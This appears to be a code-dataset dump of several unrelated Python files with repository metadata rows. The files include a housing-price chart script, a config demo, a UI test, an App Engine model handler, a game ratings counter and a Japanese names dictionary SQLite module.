            os.system("python -m http.server 8080 & > /dev/null 2>&1 ")
        else:
            os.system("ps aux | grep python | grep SimpleHTTPServer | grep -v grep | awk '{print $2}' | xargs kill")
            os.system("python -m SimpleHTTPServer 8080 & > /dev/null 2>&1 ")
    except Exception as e:
        pass
    # NOTE: the separator was converted to ';' beforehand because some
    # residential-complex names contain commas.
    df = pd.read_csv("xiaoqu.csv", encoding="utf-8", sep=";")
    # Print the total number of rows.
    print("row number is {0}".format(len(df.index)))
    # Filter out invalid records whose price is 0.
    df = df[df.price > 0]
    # # Drop duplicate rows (currently disabled).
    # df = df.drop_duplicates()
    print("row number is {0}".format(len(df.index)))
    ####################################################
    # Ranking of the most expensive residential complexes
    ####################################################
    df.sort_values("price", ascending=False, inplace=True)
    num = 3
    print(df.head(num))
    city = df["city_ch"][0]
    xqs = df["xiaoqu"][0:num]
    prices = df["price"][0:num]
    bar = Bar("{0}小区均价".format(city))
    bar.add("小区均价前{0}名".format(num), xqs, prices, is_stack=True, is_label_show=True)
    bar.render(path="xiaoqu.html")
    ####################################################
    # Ranking of district-level average prices
    ####################################################
    district_df = df.groupby('district').mean()
    district_df = district_df.round(0)
    district_df.sort_values("price", ascending=False, inplace=True)
    print(district_df)
    districts = district_df.index
    prices = district_df["price"]
    bar = Bar("{0}区县均价".format(city))
    bar.add("区县均价排名", districts, prices, is_stack=True, is_label_show=True)
    bar.render(path="district.html")
    web.open("http://localhost:8080/xiaoqu.html", new=0, autoraise=True)
    web.open("http://localhost:8080/district.html", new=0, autoraise=True)
    # Give the browser time to open both pages before the process exits.
    time.sleep(15)
| [
"ijumper@163.com"
] | ijumper@163.com |
55093be6c5bd69ff9bea241af4fdc6ab747a5870 | 3e0c57628c39e5042ed068451608a33b5edcf5df | /codex-py/test/config/demo_propmap.py | 69ec9605243caa7804fa759421b722ca3d5f7543 | [
"Apache-2.0"
] | permissive | egustafson/home-sensors | 5bd3c0f51be9a0a1f360ef41b45cbdfb3069286f | 232b36fe6fa2a2e3bce1391a91dffa192f17b835 | refs/heads/master | 2023-05-10T17:12:10.991008 | 2020-01-03T23:57:56 | 2020-01-03T23:57:56 | 141,070,153 | 0 | 0 | Apache-2.0 | 2023-05-01T20:20:24 | 2018-07-16T01:03:59 | Python | UTF-8 | Python | false | false | 1,030 | py | # -*- coding: utf-8 -*-
from codex.config.prop import PropMap
from codex.config.prop import PropList
# Demo / smoke-test script for PropMap: builds a nested map, then exercises
# dotted-key access, assignment, iteration and flattening.
tmap = { "k1": "v1",
         "k2": "v2",
         "k3": {"k3a": "v3a"},
         "k4": {"k4a": {"k4b": "v3b"}},
         # "k5": {"K$5": "v5a"},
         # "k6.k6a": "v6a",
       }
pmap = PropMap(tmap)

#print("tmap: {}".format(tmap))
#print("pmap: {}".format(pmap))
pmap.dump()
print("")

print("pmap is a {}".format(pmap.__class__))
print("pmap[k3] is a {}".format(pmap["k3"].__class__))

# Dotted-key assignment: intermediate maps are created as needed.
pmap["k9.k9a.k9b"] = "v9"

print("index k1: {}".format(pmap["k1"]))
# print("index kk: {}".format(pmap["kk"]))
print("index k3.k3a: {}".format(pmap["k3.k3a"]))
print("index k4.k4a.k4b: {}".format(pmap["k4.k4a.k4b"]))

# NOTE(review): this try/except looks intended to demonstrate a KeyError,
# but it indexes the existing key "k1" (perhaps "kk" was meant) — confirm.
try:
    print("index k1: {}".format(pmap["k1"]))
except KeyError as ex:
    print("ex: {}".format(ex))

print("pmap.items():")
for (k,v) in pmap.items():
    print(" {}: {}".format(k, v))

print("pmap.flatten():")
flat = pmap.flatten()
for (k,v) in flat:
    print(" {}: {}".format(k, v))
print("")
pmap.dump()
"eg-git@elfwerks.org"
] | eg-git@elfwerks.org |
f7e67e7c06dad3c32e3885a4e2fbdb29ab4a0a3b | 7986ec6498e3f93967fa9bfe2b6a9d4056138293 | /Protheus_WebApp/Modules/SIGATMK/TMKA061TESTCASE.py | 7e8672d16dbf8b96c9b30b4da09dadec36a8bae0 | [
"MIT"
] | permissive | HelenaAdrignoli/tir-script-samples | 7d08973e30385551ef13df15e4410ac484554303 | bb4f4ab3a49f723216c93f66a4395e5aa328b846 | refs/heads/master | 2023-02-21T11:26:28.247316 | 2020-04-28T16:37:26 | 2020-04-28T16:37:26 | 257,304,757 | 0 | 0 | MIT | 2020-04-20T14:22:21 | 2020-04-20T14:22:20 | null | UTF-8 | Python | false | false | 2,189 | py | from tir import Webapp
import unittest
class TMKA061(unittest.TestCase):
    """TIR UI test for the Protheus SIGATMK routine TMKA061: drives the
    contact-list wizard end to end and asserts the routine succeeds."""

    @classmethod
    def setUpClass(inst):
        """Open the web app, log in and navigate to routine TMKA061."""
        inst.oHelper = Webapp()
        inst.oHelper.Setup('SIGATMK','13/04/2020','T1','D MG 01 ','13')
        inst.oHelper.Program('TMKA061')

    def test_TMKA061_001(self):
        """Walk the assistant wizard to create a sales contact list.

        Each Set*/Click* call reproduces one user interaction; the exact
        order and labels mirror the wizard's screens and must not change.
        """
        self.oHelper.SetButton("Outras Ações","Assistente")
        self.oHelper.SetButton("OK")
        # Wizard step: list type and business area.
        self.oHelper.ClickLabel("Lista de Contato")
        self.oHelper.SetButton("Avançar")
        self.oHelper.ClickLabel("Vendas")
        self.oHelper.SetButton("Avançar")
        self.oHelper.ClickLabel("1 - Clientes")
        self.oHelper.SetButton("Avançar")
        # Wizard step: client filter parameters (left blank).
        self.oHelper.SetValue("Data Ultima Compra ?", "")
        self.oHelper.SetValue("Data Ultima Visita ?", "")
        self.oHelper.SetButton("OK")
        self.oHelper.ClickLabel("Detalhada")
        self.oHelper.SetButton("Avançar")
        # Wizard step: contact profile parameters.
        self.oHelper.SetValue("Nível do Contato ?", "")
        self.oHelper.SetValue("Perfil do Contato ?", "Nao Avalia")
        self.oHelper.SetValue("Ligacões não executadas ?", "Nao Considera")
        self.oHelper.SetValue("A partir de quando ?", "31/12/2004")
        self.oHelper.SetValue("Ignora os dias da semana ?", "")
        self.oHelper.SetButton("OK")
        # Wizard step: media/channel and list configuration.
        self.oHelper.ClickLabel("Voz")
        self.oHelper.SetButton("Avançar")
        self.oHelper.ClickLabel("Comercial 1")
        self.oHelper.SetButton("Avançar")
        self.oHelper.ClickLabel("Lista Aberta")
        self.oHelper.SetButton("Avançar")
        self.oHelper.SetValue("Nome Lista", "Lista Contatos Vendas- TIR")
        self.oHelper.SetValue("Servico SLA", "")
        self.oHelper.SetKey("TAB")
        self.oHelper.SetValue("Número máximo de Itens por Lista:", "000999")
        self.oHelper.SetButton("Avançar")
        self.oHelper.SetButton("Avançar")
        self.oHelper.SetButton("Avançar")
        self.oHelper.SetButton("Finalizar")
        self.oHelper.SetButton("Sim")
        self.oHelper.SetButton("OK")
        # Assert the routine reported success.
        self.oHelper.AssertTrue()

    @classmethod
    def tearDownClass(inst):
        """Close the browser session."""
        inst.oHelper.TearDown()
if __name__ == '__main__':
    # Allow running this test case directly with the unittest runner.
    unittest.main()
"hadrignoli@gmail.com"
] | hadrignoli@gmail.com |
ac807123982efe2f51ec607a6061f29be805c9f8 | 8ffb0b95591bd82df42335315b9595274740aca4 | /models/earthworm/leftover/earthworm_output.py | e0acabafbc13c8fffc4c7805920a5d9629973909 | [] | no_license | batwalrus76/ubertool_eco | 507cf5ef5a0f91f3a36a03d26d80783c3b517e79 | ed2863e37ee6066ccdfafa20f6fec3ba4f75f2d1 | refs/heads/master | 2021-01-18T10:23:27.810117 | 2015-03-24T14:50:05 | 2015-03-24T14:50:05 | 32,412,353 | 0 | 0 | null | 2015-03-17T18:30:11 | 2015-03-17T18:30:10 | null | UTF-8 | Python | false | false | 2,473 | py | # -*- coding: utf-8 -*-
import os
os.environ['DJANGO_SETTINGS_MODULE']='settings'
import webapp2 as webapp
from google.appengine.ext.webapp.util import run_wsgi_app
from google.appengine.ext.webapp import template
from uber import uber_lib
import numpy as np
import cgi
import cgitb
cgitb.enable()
from earthworm import earthworm_model, earthworm_tables
import sys
sys.path.append("../earthworm")
from uber import uber_lib
import rest_funcs
import logging
logger = logging.getLogger('earthworm')
class earthwormOutputPage(webapp.RequestHandler):
    """Google App Engine handler: runs the earthworm model on POSTed form
    inputs and renders the resulting HTML report."""

    def post(self):
        """Read model parameters from the form, run the model, assemble the
        output page from templates and persist the run via rest_funcs."""
        form = cgi.FieldStorage()
        # Model inputs: all taken verbatim from the form and cast to float.
        k_ow = float(form.getvalue('k_ow'))
        l_f_e = float(form.getvalue('l_f_e'))
        c_s = float(form.getvalue('c_s'))
        k_d = float(form.getvalue('k_d'))
        p_s = float(form.getvalue('p_s'))
        c_w = float(form.getvalue('c_w'))
        m_w = float(form.getvalue('m_w'))
        p_e = float(form.getvalue('p_e'))
        earthworm_obj = earthworm_model.earthworm(True,True,k_ow,l_f_e,c_s,k_d,p_s,c_w,m_w,p_e)
        # logger.info(vars(earthworm_obj))
        # Static model description text shown on the page.
        text_file = open('earthworm/earthworm_description.txt','r')
        x = text_file.read()
        # Assemble the page from the shared uber templates plus the
        # model-specific result tables.
        templatepath = os.path.dirname(__file__) + '/../templates/'
        ChkCookie = self.request.cookies.get("ubercookie")
        html = uber_lib.SkinChk(ChkCookie, "Earthworm Output")
        html = html + template.render(templatepath + '02uberintroblock_wmodellinks.html', {'model':'earthworm','page':'output'})
        html = html + template.render (templatepath + '03ubertext_links_left.html', {})
        html = html + template.render(templatepath + '04uberoutput_start.html', {
            'model':'earthworm',
            'model_attributes':'Earthworm Output'})
        html = html + earthworm_tables.timestamp(earthworm_obj)
        html = html + earthworm_tables.table_all(earthworm_obj)
        html = html + template.render(templatepath + 'export.html', {})
        html = html + template.render(templatepath + '04uberoutput_end.html', {})
        html = html + template.render(templatepath + '06uberfooter.html', {'links': ''})
        # Save the rendered page and the model inputs, then respond.
        rest_funcs.save_dic(html, earthworm_obj.__dict__, "earthworm", "single")
        self.response.out.write(html)
# WSGI application routing every path to the output page handler.
app = webapp.WSGIApplication([('/.*', earthwormOutputPage)], debug=True)

def main():
    """Run the WSGI application under the App Engine runner."""
    run_wsgi_app(app)

if __name__ == '__main__':
    main()
| [
"hongtao510@gmail.com"
] | hongtao510@gmail.com |
9498f268b62d247bf1b847b778e43a909832d998 | e3365bc8fa7da2753c248c2b8a5c5e16aef84d9f | /indices/manent.py | 273dc358a4c9e4ac188f99a2bae002f7951f660d | [] | no_license | psdh/WhatsintheVector | e8aabacc054a88b4cb25303548980af9a10c12a8 | a24168d068d9c69dc7a0fd13f606c080ae82e2a6 | refs/heads/master | 2021-01-25T10:34:22.651619 | 2015-09-23T11:54:06 | 2015-09-23T11:54:06 | 42,749,205 | 2 | 3 | null | 2015-09-23T11:54:07 | 2015-09-18T22:06:38 | Python | UTF-8 | Python | false | false | 43 | py | ii = [('BailJD3.py', 3), ('MereHHB.py', 4)] | [
"prabhjyotsingh95@gmail.com"
] | prabhjyotsingh95@gmail.com |
cda5bf2dba75c987106ec62af214b96ca5667188 | b162de01d1ca9a8a2a720e877961a3c85c9a1c1c | /870.advantage-shuffle.python3.py | 362f8e0a67857cb39a5b44204dba1afd05679778 | [] | no_license | richnakasato/lc | 91d5ff40a1a3970856c76c1a53d7b21d88a3429c | f55a2decefcf075914ead4d9649d514209d17a34 | refs/heads/master | 2023-01-19T09:55:08.040324 | 2020-11-19T03:13:51 | 2020-11-19T03:13:51 | 114,937,686 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 916 | py | #
# [901] Advantage Shuffle
#
# https://leetcode.com/problems/advantage-shuffle/description/
#
# algorithms
# Medium (40.29%)
# Total Accepted: 7.5K
# Total Submissions: 18.5K
# Testcase Example: '[2,7,11,15]\n[1,10,4,11]'
#
# Given two arrays A and B of equal size, the advantage of A with respect to B
# is the number of indices i for which A[i] > B[i].
#
# Return any permutation of A that maximizes its advantage with respect to
# B.
#
#
#
#
# Example 1:
#
#
# Input: A = [2,7,11,15], B = [1,10,4,11]
# Output: [2,11,7,15]
#
#
#
# Example 2:
#
#
# Input: A = [12,24,8,32], B = [13,25,32,11]
# Output: [24,32,8,12]
#
#
#
#
# Note:
#
#
# 1 <= A.length = B.length <= 10000
# 0 <= A[i] <= 10^9
# 0 <= B[i] <= 10^9
#
#
#
#
#
class Solution:
    def advantageCount(self, A, B):
        """
        Return a permutation of A that maximizes the number of indices i
        with A[i] > B[i] (LeetCode 870, "Advantage Shuffle").

        Greedy "Tian Ji horse racing" strategy: walk the values of A in
        ascending order; each value is matched against the smallest not-yet
        covered B it can beat, and values that beat nothing are sacrificed
        against the largest remaining B.  O(n log n) time, O(n) space.

        :type A: List[int]
        :type B: List[int]
        :rtype: List[int]
        """
        n = len(A)
        a_sorted = sorted(A)
        # Indices of B ordered by ascending B value.
        b_order = sorted(range(n), key=B.__getitem__)
        result = [None] * n
        lo, hi = 0, n - 1
        for a in a_sorted:
            if a > B[b_order[lo]]:
                # Beats the weakest still-unmatched B: take the win.
                result[b_order[lo]] = a
                lo += 1
            else:
                # Beats nothing: sacrifice against the strongest B.
                result[b_order[hi]] = a
                hi -= 1
        return result
| [
"richnakasato@hotmail.com"
] | richnakasato@hotmail.com |
99f97c108ff2e6878b5fa011f5843c00586d9cbf | 6136e6506d55ad37b3103e5e2f100ca7f2922bb4 | /python3.7/语感100题/81-90/90.py | a9890ecc32a3ed5b8d0d5ea5319da76df8e67f16 | [] | no_license | Ckongfu/mooc | 8911fd1112415f70a37649e48007c3ee5bfef5ba | ca0e2f4a802082e5301f0a65943d1147bb5a3b98 | refs/heads/master | 2021-05-16T18:44:36.234274 | 2020-12-24T06:43:33 | 2020-12-24T06:43:33 | 250,424,669 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 73 | py | #计算5的3.5方和9的立方根
print(pow(5,3.5))
print(pow(27,(1/3)))
| [
"zouguannan0@163.com"
] | zouguannan0@163.com |
89f4deab11dc827abf63d32d7e4af23a4e08f4ab | b031132a8ca2727827f6b1bb75f5839d327885bf | /bookworm/api/forms.py | 8b7049f862db44ea99c9d7d43892d1a1cb2ecc0a | [
"LicenseRef-scancode-public-domain",
"BSD-3-Clause"
] | permissive | erochest/threepress-rdfa | 3441ba9f272bad439b9689968cd1f668fae5c4f6 | f07e10da8a4927ab21084f4ba015d6567e665cae | refs/heads/master | 2021-07-16T21:24:00.356147 | 2011-06-10T20:42:14 | 2011-06-10T20:42:14 | 1,845,226 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 139 | py | from django import forms
class APIUploadForm(forms.Form):
epub_data = forms.FileField()
api_key = forms.CharField(max_length=255)
| [
"none@none"
] | none@none |
4d90b9ba43f5cf53dd31827df98d8a68ea8fa9cb | acf7457d3a799cb9bff12686d2d616688bcd4b5b | /packages/python/plotly/plotly/validators/scattercarpet/marker/_anglesrc.py | 3d469a500245c6cb620654f07d276ace9b20b460 | [
"MIT"
] | permissive | plotly/plotly.py | f4f61639f08160f16195efc95b5901dc5a937346 | 975a704074f01c078e0fdfa32bdf17130bf89e69 | refs/heads/master | 2023-09-06T06:15:08.340035 | 2023-08-24T12:28:14 | 2023-08-24T12:28:14 | 14,579,099 | 14,751 | 2,989 | MIT | 2023-09-08T19:55:32 | 2013-11-21T05:53:08 | Python | UTF-8 | Python | false | false | 424 | py | import _plotly_utils.basevalidators
class AnglesrcValidator(_plotly_utils.basevalidators.SrcValidator):
    """Validator for the `scattercarpet.marker.anglesrc` property — a data
    source reference for marker angles (auto-generated plotly boilerplate)."""

    def __init__(
        self, plotly_name="anglesrc", parent_name="scattercarpet.marker", **kwargs
    ):
        super(AnglesrcValidator, self).__init__(
            plotly_name=plotly_name,
            parent_name=parent_name,
            # edit_type "none": changing this property triggers no re-draw.
            edit_type=kwargs.pop("edit_type", "none"),
            **kwargs,
        )
"nicolas@plot.ly"
] | nicolas@plot.ly |
236f18e6d06d06f7411c509b2804609daba2be41 | 0ca5780b8a121b90e2191d7e394e35f49ab68828 | /tools/ratings.py | e6cc4467ebefa6bfa5fde9a97a901f84d3d5d6b0 | [
"MIT"
] | permissive | Ghloin/tweeria | 805091a40a2625f4983b960ccd477af6ffb1c1ba | 5f7cf917a6e08f15cd914c11823dbd81c11b95a1 | refs/heads/master | 2021-01-21T05:59:24.279175 | 2015-04-11T23:49:09 | 2015-04-11T23:49:09 | 33,859,414 | 1 | 0 | null | 2015-04-13T09:22:40 | 2015-04-13T09:22:39 | null | UTF-8 | Python | false | false | 8,313 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
# This is rating counter
# author: Alex Shteinikov
import __init__
import settings
import time
import random
tweenk_core = settings.core()
tweenk_balance = settings.balance()
import db
import logger
import time
class ratingsCounter:
K1 = 0.02
K2 = 1.5
K_kill = 100
RD = 25
mongo = db.mongoAdapter()
balance = settings.balance()
core = settings.core()
log = logger.logger('logs/system_events.log')
def __init__(self):
pass
def countUserRatings(self):
def countTheUserRating(sort_field, result_field):
self.players.sort(key=lambda x: x[sort_field])
self.players.reverse()
place = 1
for player in self.players:
if 'banned' in player and player['banned']:
player.update({result_field: 100500})
else:
player.update({result_field: place})
place += 1
starttime = time.time()
for player in self.players:
# Умножаем уровень на 100 млн и прибавляем опыт
# чтобы два раза не сравнивать (по уровню и по опыту)
# а учитывать общее значение
player.update({'rating':player['lvl']*100000000+player['exp']})
# Если нет информации о том сколько твитов игрока за день получено
# то считаем 0
if not 'today_parsed_tweets' in player:
player.update({'today_parsed_tweets': 0})
# Если нет информации о том сколько pvp points игрок за день набрал
# то считаем что все (что вчера у него было 0 очков)
if not 'prev_day_pvp' in player:
player.update({'pvp_per_day': player['pvp_score']})
else:
player.update({'pvp_per_day': player['pvp_score'] - player['prev_day_pvp']})
# Считаем рейтинг игрока по метрикам
global_metric = 0
if player['lvl'] == 1:
global_metric = 0
else:
if 'metrics' in player:
if 'monster_kill' in player['metrics']:
for hour in player['metrics']['monster_kill']:
global_metric += (self.balance.max_lvl-player['metrics']['monster_kill'][hour]['lvl']*self.K2)*self.K1*self.K_kill*player['metrics']['monster_kill'][hour]['value']
else:
global_metric = 0
try:
if player['ratings']['trending_position'] <= 10:
if player['ratings']['trending_position'] <= 3:
global_metric = global_metric * 0.7
elif player['ratings']['trending_position'] <= 7:
global_metric = global_metric * 0.8
else:
global_metric = global_metric * 0.9
except Exception:
pass
global_metric = global_metric + global_metric/100 * random.randint(0,self.RD)
player.update({'trending_score': global_metric})
# Считаем место игрока в глобальном рейтинге игроков по опыту,
# Если уровень одинаковый, то выше в рейтинге тот, у кого больше опыта
countTheUserRating('rating', 'rating_by_exp')
# ... в общем рейтинге игроков по pvp points
countTheUserRating('pvp_score', 'rating_by_pvp')
# ... в общем рейтинге игроков по achv_points
countTheUserRating('achv_points', 'rating_by_achv_points')
# ... trending players
countTheUserRating('trending_score', 'trending_position')
for player in self.players:
record = {
'rating_by_exp': player['rating_by_exp'],
'rating_by_pvp': player['rating_by_pvp'],
'rating_by_achv_points': player['rating_by_achv_points'],
'trending_position': player['trending_position'],
'trending_score': player['trending_score']
}
self.mongo.update('players', {'_id':player['_id']}, {'ratings':record})
message = 'Player ratings was counted by '+str(time.time()-starttime)+' seconds'
self.log.write(message)
print message
def countGuildRatings(self):
def countGuildRating(field):
self.guilds.sort(key=lambda x: x[field])
self.guilds.reverse()
place = 1
for guild in self.guilds:
guild.update({field: place})
place += 1
starttime = time.time()
for guild in self.guilds:
guild.update({
'buff_global_metric': 0,
'buff_rating': 0,
'buff_pvp': 0,
'pvp_score': 0,
})
query = []
for id in guild['people']:
query.append({'_id':id})
members = self.mongo.getu('players', search = {'$or':query}, fields = {'lvl':1, 'pvp_score':1, 'ratings':1})
for player in members:
try:
guild['buff_global_metric'] += player['ratings']['trending_score']
guild['buff_rating'] += player['lvl']
guild['buff_pvp'] += player['pvp_score']
except Exception:
pass
if len(members)<5:
guild['buff_global_metric'] = 0
guild['pvp_score'] = int(guild['buff_pvp'])
# Считает место гильдии в глобальном рейтинге гильдии
# по сумме уровня членов гильдии
countGuildRating('buff_rating')
# ... sum trending members
countGuildRating('buff_global_metric')
# .. по общему pvp_score участников
countGuildRating('buff_pvp')
for guild in self.guilds:
record = {
'rating_place_members_lvl': guild['buff_rating'],
'rating_place_members_pvp': guild['buff_pvp'],
'trending_position': guild['buff_global_metric'],
'pvp_score': guild['pvp_score']
}
self.mongo.update('guilds',{'_id':guild['_id']}, {'ratings':record})
message = 'Guilds ratings was counted by '+str(time.time()-starttime)+' seconds'
self.log.write(message)
print message
def countAll(self):
self.players = self.mongo.getu('players', {'banned':{'$exists':False}}, {'_id':1, 'lvl':1, 'exp':1, 'achv_points': 1, 'pvp_score':1, 'metrics':1, 'ratings':1})
self.banned_players = self.mongo.getu('players', {'banned':{'$exists':True}}, {'_id':1, 'lvl':1, 'exp':1, 'achv_points': 1, 'pvp_score':1, 'metrics':1})
self.guilds = self.mongo.getu('guilds',{},{'id':1, 'name':1, 'people':1})
self.countUserRatings()
self.countGuildRatings()
for player in self.banned_players:
record = {
'rating_by_exp': 100500,
'rating_by_pvp': 100500,
'rating_by_achv_points': 100500,
'trending_position': 100500,
'trending_score': 0
}
self.mongo.update('players', {'_id':player['_id']}, record)
self.exit()
def countGameStatistics(self):
count_players = []
for index in range(0, len(self.balance.faction)):
query = {'faction': index, '$or': [{'race': 0}, {'race':1}]}
count_players.append(self.mongo.count('players', query))
count_avg_level = [0,0,0]
players = self.mongo.getu('players', {}, {'lvl':1, 'faction':1})
for player in players:
count_avg_level[player['faction']] += player['lvl']
for index in range(0, len(self.balance.faction)):
try:
count_avg_level[index] = float(int(float(count_avg_level[index]) / count_players[index] * 10))/10
except Exception:
count_avg_level[index] = 0.0
current_time = time.localtime()
hashkey = str(current_time.tm_year) + str(current_time.tm_yday)
lastday_stat = self.mongo.find('game_statistics', {'type': 'lastday_avg_level'})
if not lastday_stat or time.localtime().tm_hour > 20 and not lastday_stat['hashkey'] == hashkey:
self.mongo.update('game_statistics', {'type': 'lastday_avg_level'}, {'type': 'lastday_avg_level', 'data': count_avg_level, 'hashkey': hashkey}, True)
self.mongo.update('game_statistics', {'type': 'lastday_count'}, {'type': 'lastday_count', 'data': count_players, 'hashkey': hashkey}, True)
self.mongo.update('game_statistics', {'type': 'players_count'}, {'type': 'players_count', 'data': count_players}, True)
self.mongo.update('game_statistics', {'type': 'players_avg_level'}, {'type': 'players_avg_level', 'data': count_avg_level}, True)
def exit(self):
self.log.closeFile()
if __name__ == "__main__":
    # Entry point: refresh game statistics, then recount all rating tables.
    urc = ratingsCounter()
    urc.countGameStatistics()
    urc.countAll()
| [
"alex.shteinikov@gmail.com"
] | alex.shteinikov@gmail.com |
19ce91ea22e989da8ca864d594d02929a2b81e0f | 2ac1b9ccc4d4f7f646a33e5646ed5e182ae85727 | /jamdict/jmnedict_sqlite.py | 06df43e4840531842c7f6bb7bd7887641f3844a0 | [
"MIT"
] | permissive | killawords/jamdict | 3655185f7097365b184b7979a112469430c4179f | 85c66c19064977adda469e3d0facf5ad9c8c6866 | refs/heads/main | 2023-05-28T22:00:00.813811 | 2021-06-06T04:04:03 | 2021-06-06T04:04:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,061 | py | # -*- coding: utf-8 -*-
"""
Japanese Multilingual Named Entity Dictionary (JMnedict) in SQLite format
References:
ENAMDICT/JMnedict - Japanese Proper Names Dictionary Files
https://www.edrdg.org/enamdict/enamdict_doc.html
"""
# This code is a part of jamdict library: https://github.com/neocl/jamdict
# :copyright: (c) 2020 Le Tuan Anh <tuananh.ke@gmail.com>
# :license: MIT, see LICENSE for more details.
import os
import logging
from typing import Sequence
from puchikarui import Schema
from . import __version__ as JAMDICT_VERSION, __url__ as JAMDICT_URL
from .jmdict import Meta, JMDEntry, KanjiForm, KanaForm, Translation, SenseGloss
# -------------------------------------------------------------------------------
# Configuration
# -------------------------------------------------------------------------------
MY_FOLDER = os.path.dirname(os.path.abspath(__file__))
SCRIPT_FOLDER = os.path.join(MY_FOLDER, 'data')
JMNEDICT_SETUP_FILE = os.path.join(SCRIPT_FOLDER, 'setup_jmnedict.sql')
JMNEDICT_VERSION = '1.08'
JMNEDICT_URL = 'https://www.edrdg.org/enamdict/enamdict_doc.html'
JMNEDICT_DATE = '2020-05-29'
JMNEDICT_SETUP_SCRIPT = '''INSERT INTO meta VALUES ('jmnedict.version', '{jv}');
INSERT INTO meta VALUES ('jmnedict.url', '{ju}');
INSERT INTO meta VALUES ('jmnedict.date', '{jud}');
INSERT INTO meta SELECT 'generator', 'jamdict' WHERE NOT EXISTS (SELECT 1 FROM meta WHERE key = 'generator');
INSERT INTO meta SELECT 'generator_version', '{gv}' WHERE NOT EXISTS (SELECT 1 FROM meta WHERE key = 'generator_version');
INSERT INTO meta SELECT 'generator_url', '{gu}' WHERE NOT EXISTS (SELECT 1 FROM meta WHERE key = 'generator_url');'''.format(
jv=JMNEDICT_VERSION,
ju=JMNEDICT_URL,
jud=JMNEDICT_DATE,
gv=JAMDICT_VERSION,
gu=JAMDICT_URL
)
def getLogger():
    """Return the logger for this module."""
    return logging.getLogger(__name__)
# -------------------------------------------------------------------------------
# Models
# -------------------------------------------------------------------------------
class JMNEDictSchema(Schema):
    """Database schema for JMnedict: declares the tables for entries, their
    kanji/kana forms and their translations (types, xrefs, glosses)."""

    def __init__(self, db_path, *args, **kwargs):
        super().__init__(db_path, *args, **kwargs)
        # Bootstrap: metadata inserts plus the table-definition SQL file.
        self.add_script(JMNEDICT_SETUP_SCRIPT)
        self.add_file(JMNEDICT_SETUP_FILE)
        # Meta: key/value pairs describing the data source and generator.
        self.add_table('meta', ['key', 'value'], proto=Meta).set_id('key')
        # One row per named-entity entry (idseq = entry sequence number).
        self.add_table('NEEntry', ['idseq'])
        # Kanji forms
        self.add_table('NEKanji', ['ID', 'idseq', 'text'])
        # Kana (reading) forms; nokanji marks readings not tied to kanji
        self.add_table('NEKana', ['ID', 'idseq', 'text', 'nokanji'])
        # Translation (~Sense of JMdict) with its types, xrefs and glosses
        self.add_table('NETranslation', ['ID', 'idseq'])
        self.add_table('NETransType', ['tid', 'text'])
        self.add_table('NETransXRef', ['tid', 'text'])
        self.add_table('NETransGloss', ['tid', 'lang', 'gend', 'text'])
class JMNEDictSQLite(JMNEDictSchema):
    def __init__(self, db_path, *args, **kwargs):
        """Open (or create) the JMnedict SQLite database at *db_path*."""
        super().__init__(db_path, *args, **kwargs)
def all_ne_type(self, ctx=None):
if ctx is None:
return self.all_ne_type(ctx=self.ctx())
else:
return [x['text'] for x in ctx.execute("SELECT DISTINCT text FROM NETransType")]
    def _build_ne_search_query(self, query):
        """Translate a user query string into (where_clause, params).

        The clause matches *query* against kanji forms, kana forms,
        translation glosses and translation (name) types.  If the query
        contains any of the characters '_', '@' or '%' it is treated as a
        wildcard search and LIKE comparisons are used instead of equality.
        A query of the form 'id#<non-negative int>' short-circuits to a
        direct idseq lookup.

        :param query: search string (may contain wildcards or 'id#...').
        :return: tuple (where_clause, params) for the NEEntry SELECT.
        """
        _is_wildcard_search = '_' in query or '@' in query or '%' in query
        if _is_wildcard_search:
            where = "idseq IN (SELECT idseq FROM NEKanji WHERE text like ?) OR idseq IN (SELECT idseq FROM NEKana WHERE text like ?) OR idseq IN (SELECT idseq FROM NETranslation JOIN NETransGloss ON NETranslation.ID == NETransGloss.tid WHERE NETransGloss.text like ?) OR idseq IN (SELECT idseq FROM NETranslation JOIN NETransType ON NETranslation.ID == NETransType.tid WHERE NETransType.text like ?)"
        else:
            where = "idseq IN (SELECT idseq FROM NEKanji WHERE text == ?) OR idseq IN (SELECT idseq FROM NEKana WHERE text == ?) OR idseq IN (SELECT idseq FROM NETranslation JOIN NETransGloss ON NETranslation.ID == NETransGloss.tid WHERE NETransGloss.text == ?) or idseq in (SELECT idseq FROM NETranslation JOIN NETransType ON NETranslation.ID == NETransType.tid WHERE NETransType.text == ?)"
        params = [query, query, query, query]
        # 'id#<n>' → look the entry up directly by its sequence number.
        try:
            if query.startswith('id#'):
                query_int = int(query[3:])
                if query_int >= 0:
                    where = "idseq = ?"
                    params = [query_int]
        except Exception:
            pass
        getLogger().debug(f"where={where} | params={params}")
        return where, params
def search_ne(self, query, ctx=None, **kwargs) -> Sequence[JMDEntry]:
if ctx is None:
with self.ctx() as ctx:
return self.search_ne(query, ctx=ctx)
where, params = self._build_ne_search_query(query)
where = 'SELECT idseq FROM NEEntry WHERE ' + where
entries = []
for (idseq,) in ctx.conn.cursor().execute(where, params):
entries.append(self.get_ne(idseq, ctx=ctx))
return entries
def search_ne_iter(self, query, ctx=None, **kwargs):
if ctx is None:
with self.ctx() as ctx:
return self.search_ne(query, ctx=ctx)
where, params = self._build_ne_search_query(query)
where = 'SELECT idseq FROM NEEntry WHERE ' + where
for (idseq,) in ctx.conn.cursor().execute(where, params):
yield self.get_ne(idseq, ctx=ctx)
def get_ne(self, idseq, ctx=None) -> JMDEntry:
# ensure context
if ctx is None:
with self.ctx() as new_context:
return self.get_entry(idseq, new_context)
# else (a context is provided)
# select entry & info
entry = JMDEntry(idseq)
# select kanji
kanjis = ctx.NEKanji.select('idseq=?', (idseq,))
for dbkj in kanjis:
kj = KanjiForm(dbkj.text)
entry.kanji_forms.append(kj)
# select kana
kanas = ctx.NEKana.select('idseq=?', (idseq,))
for dbkn in kanas:
kn = KanaForm(dbkn.text, dbkn.nokanji)
entry.kana_forms.append(kn)
# select senses
senses = ctx.NETranslation.select('idseq=?', (idseq,))
for dbs in senses:
s = Translation()
# name_type
nts = ctx.NETransType.select('tid=?', (dbs.ID,))
for nt in nts:
s.name_type.append(nt.text)
# xref
xs = ctx.NETransXRef.select('tid=?', (dbs.ID,))
for x in xs:
s.xref.append(x.text)
# SenseGloss
gs = ctx.NETransGloss.select('tid=?', (dbs.ID,))
for g in gs:
